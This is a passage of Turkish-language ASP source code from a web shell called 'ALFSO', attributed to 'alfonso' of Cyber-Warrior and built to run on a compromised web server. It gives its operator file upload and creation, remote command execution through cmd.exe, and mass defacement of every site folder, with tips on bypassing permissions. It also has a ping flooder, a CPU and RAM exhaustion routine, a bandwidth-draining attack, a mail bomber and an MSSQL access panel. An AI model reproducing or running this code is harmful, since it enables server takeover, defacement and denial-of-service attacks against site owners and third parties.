on error resume next

response.write "<table width=""100%"">"

response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"

response.write "<form name=""dosyanameedit"" action='"&FilePath&"' type=""post"">"

response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"" >"

tablo30(" <b>Dosya ADý deðiþtirme MErkezi</b>")

tablo30("Adý :  <font color=#C6FCBE>"&islem&"</font> <br> Yeri :  <font color=#C6FCBE>"&file&"</font>")

response.write "<input type=""hidden"" value=""17"" name=""mode""><input type=""hidden"" value="&file&" name=""file""><input type=""hidden"" value="&FolderPath&" name=""konum""><input type=""hidden"" value="&time&" name=""Time""> " 

tablo12("<b>Dosyanýn Yeni Adý:  </b> &nbsp;<input  size=""30"" type=""text"" name=""islem"" value="&islem&">")

tablo12("<br><input value="" Gönder "" type=""Submit"">")

response.write "</form></table></td></tr></table><br>"

Call Hata
 

CASE 17 ' Dosya Adý deðiþtirme Olayý gerçekleþiyor by ALFONSO

on error resume next

Set fileObject = fso.GetFile(file) 

fileObject.Name = islem 

if err <> 0 then

	Call olmadi("<br>DOsya Adý deðiþeMEdii<br><br>")

else

	Call oldu("<br>Dosya Adý deðiþti<br><br>")

end if

Set fileObject = Nothing 

Call Hata
 

CASE 18 ' MAss Defeced Merkezi by alfonso

on error resume next

response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"

response.write "<form name=""massattack"" action='"&FilePath&"' type=""post"">"

response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"

tablo30(" <b>MASS Defaced Merkezi</b>")

tablo30("...... :::::  Ýndex KOD unu Aþaðýya Yaz / Yapýþtýr   ::::: ......")

tablo30("<br><b>Konum : </b><input style=""color=#C6FCBE"" size=""60"" name=""konum"" value='"&konum&"' type=""text""><br><br>")

response.write "<input type=""hidden"" value=""19"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""> " 

tablo12O("<textarea  style=""width:500px; height:250px"" name=""file""></textarea>")

tablo12O(" <input type=""radio"" value=""brute"" name=""islem"" checked> Brute  -   <input value=""single"" type=""radio"" name=""islem"" > Single   -   <input value=""ozel"" type=""radio"" name=""islem"" > Private <input name=""inject1"" value=""z.html"" type=""text"" size=15>  &nbsp;&nbsp; <input value=""ok"" type=checkbox name=""hash3"" >Eklenti <input size=15 name=""hash2"" value=""httpdocs\"" type=""text"">")

tablo12O("<input name=""hash9"" value=""copy"" type=radio checked> Kopyalayarak  -  <input name=""hash9"" value=""yarat"" type=radio> Oluþturarak")

tablo12O("<input value="" Havayaa Uçurr "" type=""Submit"">")

yazsol("<font color=#C6FCBE><b>Brute : </b>Belirtilen Dizinin ALtýndaki; Tüm Dizinlere ve onlarýnda ALt Dizinleri Ýndex BAsar. </font>")

yazsol("<font color=#C6FCBE><b>Single : </b>Belirtilen Dizinin ALtýndaki; Alt Dizinlere Ýndex BAsar. </font>")

yazsol("<font color=#C6FCBE><b>Private : </b>Belirtilen Dizinin ALtýndaki; Alt Dizinlere Ýstediðiniz Ýsimle Ýndex BAsar. </font> ")

yazsol("<font color=#C6FCBE><b>Eklenti : </b>BRUTE & Single ile kullanýlýr. Permsion var ise bunu seçmenize ayarlamanýza gerek yok. Eðer site isimlerini listeleytebiliyor, ve içine girremiyor fakat klasör atlayarak girebiliyorsanýz. o zaman bunu seçin ve bulunan klasörrden sonrakine gidip oraya index leri atar. Mesela ; '..site\alfonso_com', '..\site\haber_com' .. gibi siteelr listeli. bunlarýn içlerine giridðinizde görüntülkeme yetkinzi yok . Ama eðer '..\site\alfonso_com\www\' yapýnca girebiliyorsnaýz. PERMÝSÝON aþma yöntemidir. böylece Eklenti yerine 'www' yazarak ve seçerekden. tüm sitelere o klaösr içine girme yetkisini saðlayýp, index býraktýrýrrýz. </font> ")

yazsol("<font color=#C6FCBE><b>Kopyalayarak : </b>FSO dizinine bir TXT yazar. Sonra onu TÜm  klasörlere KOpyalayarak iþlem yapar. Eðer FSO dizininde yazma yok ise, iþlem gerçekleþmez. TÜM MASS lar böyledir. </font> ")

yazsol("<font color=#C6FCBE><b>Yaratarak : </b>Direk index kodunuzu, Klasölerde OLUÞTURARAk MASS yapar. BU alfonso &  alfonsoPORTAL.CoM FARký ile. 1-2 defa baþýma geldi=) o yüzden bu özelleiði ekledim.</font> ")

yazsol("<font color=#FE7A84><b>NOT : </b>Brute & Single da 9 çeþit index basar, Private da Ýstdiðiniz Ýsimle 1 tane atar ;) </font>")

response.write "</table></td></form></tr></table><br>"

Call Hata
 

CASE 19 ' MAss Attack ÝÞleniyor. Eðer Ýndex yok ise, Hata ve FOrm sunuyor, aksi halde MASS yapýyor. 

file = file&"<center><br><br><font color=green><b></b></font><br></center>"

if hash9 = "copy" then

on error resume next

a=Left(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),InStrRev(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),"\"))

Set hackindex = FSO.CreateTextFile(a&"\alfonso.txt", True)

hackindex.write file

if err <> 0 then

response.write "<center><br><font color=#FE7A84> <font face=Wingdings size=5>N</font> Bulunduðun Dizinde Yazma YEtin yok. Bu yüzden Ýndex Sayfasý oluþturulamadý. <font face=Wingdings size=5>N</font> <br><br>  <font face=Wingdings size=5>N</font>  Eðer ki Server içine bir Tane index yükler ve aþaðýdaki yere tam link ini yazarsan, O zaman MASS Defaced baþlýyacaktýr. <font face=Wingdings size=5>N</font> <br><br><br></center>"

response.write "<table width=""100%"">"

response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"

response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"

response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"

response.write "<input type=""hidden"" name='islem' value='"&islem&"'><input type=""hidden"" name='inject1' value='"&inject1&"'><input type=""hidden"" name='file' value='"&file&"'><input type=""hidden"" name='Time' value='"&time&"'><input type=""hidden"" name='mode' value='20'><input type=""hidden"" name='konum' value='"&konum&"'>"

Call tablo30("<b>Ýndex in Server daki kendi Ýndex inin YErini GÖster. </b>")

Call tablo30("&nbsp;")

Call tablo12("<input  size=""80"" type=""text"" name=""hacked"" style='color=#C6FCBE' value='"&FolderPath&"&/index.html'>")

Call tablo12("<br><input value="" OK tamamdýr. Ýndex imi seçtim.  "" type=""Submit"">")

response.write "</form></table></td></tr></table><br>"

else

set hacking = nothing

hacked = a&"\alfonso.txt"

hash6 = konum

Call MassAttack2(konum,file,hash2)

Call MassAttack(hash6,file,hash2)

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "

Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandý... ')</script>"

end if

else  if hash9 = "yarat" then

hash6 = konum

Call MassAttack2(konum,file,hash2)

Call MassAttack(hash6,file,hash2)

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "

Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandý...1 ')</script>"

end if 

end if

Call Hata
 

CASE 20 ' Hata sonucu, düzeltme yapýldý ise, burdan MAss dewaam ediyor.

on error resume next

Set cloner2 = fso.GetFile(hacked)

if err <> 0 then

response.write "<br><br><br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Ýndex Bulunamadý. KOnumunu veridðin Ýndex yada Dosya BULUNAMADI. Mass Durdurudu !!!  <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br><br><br>"

set cloner2 = nothing

else

set cloner2 = nothing

file="alfonso"

hash6 = konum

Call MassAttack2(konum,file,hash2)

Call MassAttack(hash6,file,hash2)

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "

Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandý...2 ')</script>"

end if

Call Hata
 

CASE 21 ' MASS tester formu by alfonso

on error resume next

response.write "<table width=""100%"" class=""kbrtm"">"

response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"

response.write "<form name=""masstester"" action='"&FilePath&"' type=""post"">"

response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"

tablo30(" <b>MASS Permision Tester</b>")

tablo30("...... :::::  Ýzinleri Kontrol Eder   ::::: ......")

tablo30("<br><b>Konum : </b><input style=""color=#C6FCBE"" size=""60"" name=""konum"" value='"&konum&"' type=""text""><br><br>")

response.write "<input type=""hidden"" value=""22"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""> " 

tablo12O("<br><input value="" Teste Baþlaaaa... =) by alfonso "" type=""Submit""><br><br>")

tablo12("&nbsp;")

response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""left"" width=""100%""  ><font color=#C6FCBE><b>NOT : </b>Bununla, Alt klasörlerde Permision varmý yok mu ,Onu kontrol eder ve Listeler... </font>  <font color=#C6FCBE face=Wingdings size=5>N</font></td></tr>"

response.write "</form></table></td></tr></table><br>"

Call Hata
 

CASE 22 ' MASS TEster iþleme görüntüleme by alfonso

Call Tester(konum)

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... ::::  Bitttiiii  :::: ..... </b></td></tr></table> "

response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "

Response.Write "<script language=javascript>alert('Yetki Kontrolu tamamalandý... ')</script>"

Call Hata
 

CASE 23 ' arama bulma- en güzel özeliði time out olmamasý bulduðunu yazmasýdýr =) by alfonso eseridir. 

response.write  "<br><center>"

i=0

Call arama(konum)

response.write  "</center><br>"

Response.Write "<script language=javascript>alert('"&i&" Kayýt Bulundu .... ')</script>"

nolist = True

Call Hata
 

CASE 24 ' Klasör iþlermleri için Upload - Dosya ayarat - klaösr yarat FORM larý by alfonso

on error resume next  

response.write "<table bgcolor=#000000 width=""100%"" ><tr><td>"

response.write "<center><table width=""100%""><tr><td class=""kbrtm"" align=""center""> Upload Merkezi  </td></tr><tr><td align=""center"" class=""kbrtm"">"

response.write "<form name=frmUpload method=post enctype=""multipart/form-data"" action='"&FilePath&"?mode=25&Time="&time&"&Path="&konum&"' ID=""Form1"">"

response.write "<input type=hidden name=folder value='"&konum&"' ID=""Hidden1"">"

response.write "Max: <input type=text name=max value=5 size=5 ID=""Text1""> <input type=button value=""Ayarla"" onclick=setid() ID=""Button1"" NAME=""Button1"">"

response.write "<table ID=""Table1"">"

response.write "<tr>"

response.write "<td id=upid>"

response.write "</td>"

response.write "</tr>"

response.write "</table>"

response.write "<input type=submit value="" ... ::  Upload  :: ... "" ID=""Submit1"" NAME=""Submit1"">"

response.write "</form>"

response.write "<script>"

response.write "setid();"

response.write "function setid() {"

response.write "    str='';"

response.write "    if (frmUpload.max.value<=0) frmUpload.max.value=1;"

response.write "    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input size=30 type=file name=file'+i+'><br>';"

response.write "    upid.innerHTML=str+'<br>';"

response.write "}"

response.write "</script>"

response.write "</td></tr></table></center>"

response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""dosycrete"" action='"&FilePath&"?mode=26&konum="&konum&"&Time="&time&"' method=""post""><tr><td align=""center"">Klasör Oluþtur : <input name=""file"" value=""alfonso"" type=""text""> <input name=""git"" value="" Oluþtur "" type=""Submit""></td></tr></table></form></center>"

response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""filemaker"" action='"&FilePath&"?mode=27&konum="&konum&"&Time="&time&"' method=""post""><tr><td align=""center"">Dosya Adý : <input name=""file"" value=""alfonso.asp"" type=""text""></td></tr><tr align=""center""><td><textarea style='width:100%;height:100;' name=""islem""></textarea></td></tr> <tr align=""center""><td><input name=""git"" value=""..:: Oluþtur ::.."" type=""Submit""></td></tr></table></form></center>"

response.write "</td></tr></table>"

Call Hata
 

CASE 25 ' Upload iþlemi by ALFONSO

Upload()
 

CASE 26 ' Klasör yarat by ALFONSO

response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"

if FSO.FolderExists(konum&"\"&file) = True then

response.write "<center> <font color=#FE7A84> <font  face=Wingdings size=5>N</font> Böyle Bir Klasör ZATEN VAr !!!! <font color=#FE7A84> <font  face=Wingdings size=5>N</font> </font> </center>"

else

on error resume next

FSO.CreateFolder(konum&"\"&file)

if err <> 0 then

olmadi("Klasör Oluþturulamadý")

else 

oldu("Klasör Oluþturuldu")

end if

end if

response.write "</td></tr></table>"

Call hata
 

CASE 27 ' Dosya yarat by alfonso

response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"

on error resume next

Set MyFile = FSO.CreateTextFile(konum&"\"&file, True)

MyFile.write islem

if err <> 0 then

olmadi("Dosya Oluþturulamadý")

else 

oldu("Dosya Oluþturuldu")

end if

response.write "</td></tr></table>"

MyFile.close()

Call hata
 

CASE 28 ' CMD Formu ve iþlem yeri  by alfonso

if cmdkod="" then cmdkod="ipconfig"

response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"

response.write "<form name=""commmanderbyalfonso"" method=""Post"" action='"&FilePath&"?mode=28&konum="&konum&"'> <b>CMD Komut Listele : </b><input style='color=#DAFDD0' name=""cmdkod"" size='57' value='"&cmdkod&"' type='text'><input name='"&konum&"' value='"&konum&"' type='hidden'><input name='"&mode&"' value=""28"" type='hidden'><input name='"&file&"' value=""a"" type='hidden'><input value="".:Görüntüle:."" type='Submit'> "

response.write "</td></tr></form></table></center>"

response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"

response.write "<textarea style='color=#DAFDD0;width:100%;height:320;'>"

response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdkod).stdout.readall

response.write "</textarea>"

response.write "</td></tr></form><form name=""commmanderbyalfonso2"" method=""Post"" action='"&FilePath&"?mode=28&konum="&konum&"'><tr><td><b>CMD Komut Çalýþtýr: </b><input style='color=#DAFDD0' name=""inject4"" size='57' value='"&inject4&"' type='text'><input name='inject5' value='alfonso' type='hidden'><input value="" .: Çalýþtýr :. "" type='Submit'></td></tr>"

if inject5 = "alfonso" then

on error resume next

tablo12("Komut Çalýþtýrýldý. ")

end if

response.write "</form></table></center>"

response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm"">"

tablo12L("<font color=#FE7A84><b>NOT : </b> CMD komutlarý tamamen , Server üzerinde çalýþmaktadýr. Siz burda yazacaðýnýz komut orda çalýþýp, size geri dönecektir.")

tablo12L("<font color=#FE7A84><b>NOT : </b> <b>CMD Komut Listele</b> olayý, >dir, >netstat, >ping gibi geri DOS da geri bilgi döndüren komutlar kullanýlýr. AMA eðer program çalýþýtmrka, traojan yada Notepad gibi fonksiyonal ve applicaitonlý programlar, komutlarýda <b>CMD komut Çalýþtýr</b>dan Uygulamanýz gerekir.Aksi halde Sistem kýsa süreli kitlenme yaþanýr. CEvap alýnamayabilinir.GEreðinden fazla çalýþýtrm yaparsnýz , Ýþlemcide Sizin Userýnýzýn <b>RAM + CPU </b>kullnýmý anormal artacaktýr. </font>  <font color=#FE7A84 face=Wingdings size=5>N</font>")

yazorta("<a href='"&FilePath&"?mode=29&konum="&konu&"&Time="&time&"' onclick=""cmdhelp(this.href);return false;"">-->>  Kullanýlabilir CMD komutlarýndan BAzýlarý   <<-- </a>")

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b>by alfonso</b></td></tr></td></tr></table></center>"
 
 

CASE 29 ' CMD açýklama kýsmý HELPER by alfonso

response.write "<center>"

yazsol("<b>Attrib</b>: Attrib komutu dosyalara belli özellikleri verir veya kaldýrýr. c:\>attrib +r +a +s +h yazýp enter tuþuna basarsak.(help için : <b> ' attrib /?  ' </b>)")

yazsol("<b>Copy - xcopy</b> : Copy ve xcopy komutu ile istenilen dosya yada dosyalarýn baþka yerlere kopyalanmasý iþlemi gerçekleþtirilir. Bilgi için bunu yazýn :' <b>copy /? '</b>")

yazsol("<b>Net use</b> : Pc nin Paylaþým, Hesaplarý, ayarlarý, kullanýcýlarý... gibi özellliklere ulaþabileceðimiz ve deðiþtirebileceðimiz bir komut <b>NET</b> . Yarým dosyasý için -> <b> net help </b> yazmanýz yeterlidir.")

yazsol("<b>Netstat</b> : PC deki açýk portlarý, ve dilediðiniz port u dinleyebilirsiniz. <b>Netstat -a -b -e -n -o -r -s -v</b> gibi parametreler alýr.")

yazsol("<b>Tracert</b> : Site, Ip, server ýn nerde olduðunu tracert yapar. <b>tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name</b> ")

yazsol("<b>IPCONFIG</b> : Server , PC nin IP bilgileirni, network bilgileirni veriyor. kulným için - > <b>ipconfig help</b>  yazýn yeterldir ")

yazorta("<b>by alfonso</b>")

response.write "</center>"
 

CASE 30 ' PiNGer BY alfonso - Server üzerinden sýnýrsýz ping saldýrrýsý. =) Coded by alfonso

if not file = "1" then

response.write "<center><table align=""center"" width=""100%""><tr><td><form action='"&FilePath&"?mode=30&file=1&konum="&konum&"' method='post' name='pingerbye_jder'>"

yazsol(" Site Adý : <input style='color=#DAFDD0' name='url' value='siteadý.com' type='text' size=30> (Örnek: google.com) ")

yazsol(" Ping Sayýsý : <input style='color=#DAFDD0' name='inject1' value='20' type='text' size=20> (Örnek: 20) ")

yazsol(" Ping TimeOut Süresi : <input style='color=#DAFDD0' name='islem' value='750' type='text' size=20> milisaniye (Örnek:750) ")

yazsol(" Paket Boyutu : <input style='color=#DAFDD0' name='size' value='32' type='text' size=20> byte (32) ")

response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <input name='bombalaalfonso' value=' .::  Bombala  ::. ' type='Submit' > </td></tr></table>"

response.write "</form></td></tr></table>"

yazsoll("  <font color=#C6FCBE> Not: Bunu kullanýrken gireceðiniz Paket boyutu Önemlidir. Mümkünce aþýrý büyük paket girmeyin, çünkü server yada site nereye saldýrrýyorsanýz, büyük paketleri filtreler ve cevap vermezler. O yüzden sürekli TÝmeOUT yazar. o yüzden yaa Boþ býrakýn yada 500 gibi normal bir seviye seçin.  <font color=#C6FCBE> <font face=Wingdings size=5>N</font> </font>  ")

yazsoll("<font color=#C6FCBE> Not: PÝNG sayýsýný 98 dediniz mesela, Sistem bunu 10 hamlede yapacaktýr. 10 arlý gönderektir. vede süreklisayfa kendini yenileyip, 98 olana kadar 10 ar 10 ar ping ee dewam edecektir. Burda TÝMEout OLMA gibi sorunumuz yok. 100000 deseniz bile, o bitne kadar gece gündüze ping çekebilien sistem geliþtirdim. Korkmadan, vede gece açýk býrakarak sýnýrsýz pingler çekebilirisniz.  <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")

yazsoll(" <font color=#FE7A84> Not: ALFONSO, com.tr, gov.tr uzantýlý sitelere karþý koruma aldým. Ping Attaker bu sitelere karþý Çalýþtýtýlamaz, ve çalýþýtýrlsa bile Ping atmaz, size Uyarý verir. TÜrk Siteleri Koruma ilk hedefimizdir. TÜrk TÜrk ü Vurmaz. by alfonso <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")

yazsoll("<font color=#C6FCBE> <b>Ping Attack alfonso</b> tarafýndan yazýlmýþ olup, biraz hayal gücü, biraz çaba azimle, þu an kulanýdðýnýz FSO yuda yazan olarak, bundaki amacým Server ýn ,sitenin kaynaklarýný sömürmek vede onun üzerinden onun kaynaklarýný kullanrak baþka yerlerede zarar , saldýrý yapam güdenmiþtir. BUndada BUnlaa baþladým. <b>TÜM haklarý alfonso e aittir.</b> <font color=#C6FCBE> <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font>  ")

else

if inject1 = "" then inject1 = 0

if count = "" then count = 0

if CInt(inject1) > CInt(count) + 10 then

	Call Ping_Bomb_alfonso(url,10,islem,size)

	count = count + 10

	inject2 = ""&FilePath&"?file=1&mode=30&url="&url&"&size="&size&"&count="&count&"&inject1="&inject1&"&islem="&islem&""

	response.write "<META http-equiv=refresh content=2;URL='"&inject2&"'>"

	response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&count&"/"&inject1&"</b> tane Ping Çekildi. </td></tr></table>"

else if CInt(inject1) > CInt(count) then

	Call Ping_Bomb_alfonso(url,CInt(inject1) mod 11,islem,size)

	count = count + (CInt(inject1) mod 11)

	yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Çekildi... ")	

	yazortaa(" Pinger Attack by alfonso 1.0 iþlemini tamamladý...  ")

else 

	yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Çekildi... ")	

	yazortaa(" Pinger Attack by alfonso 1.0 iþlemini tamamladý...  ")

end if

end if

end if
 

CASE 31 ' Server RAM & CPU Saldýrýsý

cmdd = array("C:\WINDOWS\System32\mspaint.exe","C:\Program Files\Internet Explorer\iexplore.exe","C:\WINDOWS\system32\notepad.exe")

if islem = "1" then

on error resume next

response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(0))

else if islem = "2" then

on error resume next

response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(1))

else if islem = "3" then

on error resume next

response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(2))

else

if not file = "1" then

response.write "<center><table align=""center"" width=""100%""><tr><td>"

yazorta("<b> RAM & CPU Saldýrýsý for SERVER by alfonso =) 1.0 </b>")

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><font color=#C6FCBE>  Server ýn CPu ve RAm kaynaklarýný 1 dk içinde tüketebilen bir alfonso eseridir. Bununla sadece, 3 tür program sürekli açýlýr ve kapatýlmaz(Paint, Notepad, Explorer) Server en fazla 1 dk içinde Ram&Cpu sorunu ve kitlenmeler, cevap vermemeler, hatat resetlenme ilede sonuçlanabilir.</font></td></tr></table>"

yazorta(" <a href='"&FilePath&"?mode=31&file=1'>..::  RAM & CPU Attacker ý ÇALIÞTIR .. by alfonso  ::..</a> ")

response.write "</td></tr></table></center>"

else

Call Ram_Cpu

end if

end if

end if

end if
 

CASE 32 ' SÝte kaynak Sömürücü by alfonso =)

if not islem = "1" then

response.write "<center><table align=""center"" width=""100%""><tr><td>"

yazorta("<b> SÝte Kaynak Sömücü 1.0 by alfonso </b>")

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""sitefuckerbyalfonso"" method='post' action='"&FilePath&"?mode=32'>Site Adresi : <input name='url' value='http://www.siteadi.com' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Robot Sayýsý : <input name='file' style='color=#C6FCBE' type='text' value='50' size=30> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Sömür ::..' type='Submit'></td></tr></form></table>"

yazsol("Belirttiðiz kadar Robot kadar baðlanýr ve siteyi sömürür. Ayrýca Saldýrý sürekli kendini güceller, yeniler. Sonsuzdur. =) Robot u Baðlantýnýza göre ayarlayýn. Mesela; Robot u 50 yaparsanýz.O sayfa içinde 50 tane ayný anda açýlacak site ve indirecektir siteleri. ve o sýrada sürekli siz, dosya indiroyr geçiçi olarak. VE bu olay her 30 snde güncelleniyor Otomatik. Birkez çalýþýtr Ömür boyu kapatmazsan penceryi çalýþýr bir MAkina.")

yazsol("Site kodlarýný, BAndwith ini ve ASP kitlenmesi yada SQL sömürmede, ressim, text sömürmede ÜStüne yoktur..")

yazorta("TÜm haklarý Saklýdýr by alfonso =)")

response.write "</td></tr></table></center>"

else

on error resume next

yazorta("<b> SÝte Kaynak Sömücü 1.0 by alfonso =) 1.0 </b>")

yazorta("Sömürme MEkanizmasý Devrede...")

yazsol("Durdurmak için Pencereyi kapat. "&file&" Kadar baðlanýp 30 sn da günceliyor saldýrýyý...")

yazorta("<b>by alfonso</b>")

Call Somurgen(file,url)

yazorta(" 20 SN sonra yenileniyor... by alfonso =) ")

response.write "<META http-equiv=refresh content=20;URL='"&FilePath&"?mode=32&islem=1&url="&url&"&file="&file&"'>"

end if
 

CASE 33 ' Mail BOMber by alfonso :) TÜm Kodlarýn FSO nun HAklarý ALFONSO ya aittir. Sýnýrsýz Mail atma imkaný sunuyorum size. Kýyaðýmý unutmayýn...

if not islem = "1" then

response.write "<center><table align=""center"" width=""100%""><tr><td>"

yazorta("<b> Mail Bomber 1.1 by alfonso </b>")

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""mailbomberbyalfonso"" method='post' action='"&FilePath&"?mode=33'>Mail Adresi : <input name='file' value='deneme@hotmail.com' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Bomb Sayýsý : <input name='count' style='color=#C6FCBE' type='text' value='50' size=22> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Bommbala ::..' type='Submit'></td></tr></form></table>"

yazsol("Sýnýrsýz Mail Bomb. Cdonts & Cydos Destekler. %100 inbox. Cyberwarrior.com , org, net ,maillerine Bomb yapamazsýnýz.")

yazorta("TÜm haklarý Saklýdýr by alfonso =)")

response.write "</td></tr></table></center>"

else

if request.cookies("bilesen") = "0" then

if MailKorumasi(file) = 0 then

	if inject1 = "" then inject1 = 0

	if CInt(inject1) + 9 < CInt(count) then

		for j=0 to 10

			Call MailBomber_by_alfonso(file)

		next

		inject1 = inject1 + 10

		response.write "<META http-equiv=refresh content=1;URL='"&FilePath&"?mode=33&islem=1&file="&file&"&count="&count&"&inject1="&inject1&"'>"

		response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... </td></tr></table>"		

	else if CInt(inject1)  < CInt(count) then

		for j=0 to (count mod 10)

			Call MailBomber_by_alfonso(file)

		next

		inject1 = inject1 + (count mod 10)

		yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... ")	

		yazortaa(" Mail Bomber by alfonso 1.0 iþlemini tamamladý...  ")

	else

		yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... ")	

		yazortaa(" Mail Bomber by alfonso 1.0 iþlemini tamamladý...  ")

	end if

	end if

else

response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font  face=Wingdings size=5>N</font> BOMB yapýlamadý. Tasvip etmediðimiz Bir mail e Saldýrdýðýnýz için. by alfonso !!!! <font color=#FE7A84> <font  face=Wingdings size=5>N</font> </font> </td></tr></table>"

end if

else

response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font  face=Wingdings size=5>N</font> Server Gerekli Olan Cdonts yada Cydos Bilesenlerini desteklemiyor. <font color=#FE7A84> <font  face=Wingdings size=5>N</font> </font> </td></tr></table>"

end if

end if
 

CASE 34 ' MSSQL - MYSQL Baðlantý Formu by alfonso ;)

if not islem = "1" then

Call MSSQL_Form

yazortaa(" Eðerki, Sitelerin MSSQL bilgilerini biliyorsanýz, bununla çok kolay baðlanabilir.. ")

yazortaa(" Tablolarý görebilir, üzerinde SQL komut çalýþtýrabilir, verileri okuyaiblirisniz ")

yazortaa(" Çok saðlam ve güçlü bir MSSQL Manager hizmeti Saðlar size...")

yazortaa(" <b>by alfonso :)</b>")

else

Call SQL_menu_by_alfonso

Call Tablolama

end if

nolist = True
 

CASE 35 ' MSSQL - MYSQL Conneciton için by alfonso ;)

Call SQL_menu_by_alfonso

Call MSSQL_by_alfonso(alfonsosql,table)

nolist = True
 

CASE 99 ' alfonso WAS HERE - FEEL THE POWER OF TURKS

'Türk Bayraðý Ascii Karakterlerle - Created By ALFONSO :)

Response.Write "<br><center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000"">&nbsp;</td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center><br>"

yazorta("<b>Biz Ne yaptýk / What We Do?</b>")

yazsol("Biz bir FSO & MSWCTools & XMLHTTP Compenent lerini kullanarak Server a site üzerinden HTTP protocolunden eriþim saðlandýðýnda, Size Server ýn tüm imkanlarýndan yararlanmanýz için, Permission, þifre, gizli tüm içeriklere direk ulaþma, yada aþma gibi özelikleri olan. Server ý çökertmeye , hatta kaynaklarýný son damlasýna kullanabilen Cyber-Warrior.CoM adýna hizmet veren Bir Canavar yarattýk.")

yazorta("<b>Adý ? Name ?</b>")

yazsol("Bu yazýlým alfonso yazýlýmýdýr. Bunun adý <b>a</b>alfonso <b></b>F<b>SO</b> dur. oda kýsaca -> <b>ALFSO'dur</b>")

yazorta("<b>Biz Kimiz / Who We Are?</b>")

yazsol("<b><a href=""mailto:cwalfonso@hotmail.com"">alfonso</a> : Sitemiz <a href=""http://cyber-warrior.com"" target=_blank"">http://cyber-warrior.com</a></b>")

olmadi("<b>..:: TAKLÝTLERÝNDEN SAKININ !!! ::..</b>")
 

CASE 36 ' SQL komut YArdým kýlavuzu by alfonso

yazorta("<b>SQL Komut Yardým Merkezi by alfonso :) </b>")

yazsoll("<b>SELECT</b> - Seçme&listeleme")

yazsol("Select * from TABLEADI<br> Select * from TABLEADI where SUTUNADI = DEÐER <br> Select * from tblAdmin where ID = 1")

